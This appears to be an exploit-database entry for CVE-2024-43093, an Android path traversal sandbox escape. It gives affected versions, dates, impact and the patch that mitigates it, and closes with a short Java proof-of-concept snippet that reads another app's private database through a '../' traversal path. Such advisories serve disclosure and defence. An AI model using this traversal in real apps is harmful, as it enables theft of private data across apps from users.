cd ../exploit-db
    root@mhfh:~#cat /var/db/exploits/CVE-2024-43093.json
    exploits/CVE-2024-43093.md
    CVE-2024-43093AndroidSandboxHigh

    Framework path traversal sandbox escape

    affected
    12-15
    disclosed
    2024-11-04
    discovered
    2024-09-20
    patched
    November 2024 ASB
    author
    Google AOSP
    platform
    Android

    ## description

    Path traversal in the Android framework allows an attacker app to access files outside its sandbox in protected directories such as Android/data and Android/obb.

    ## impact

    Cross-app data exfiltration. Active exploitation reported by Google.

    ## mitigation

    Apply November 2024 Android security patch level.

    ## proof of concept

    // Path traversal payload
    File f = new File(ctx.getExternalFilesDir(null),
      "../../../Android/data/com.victim/files/secret.db");
    FileInputStream in = new FileInputStream(f);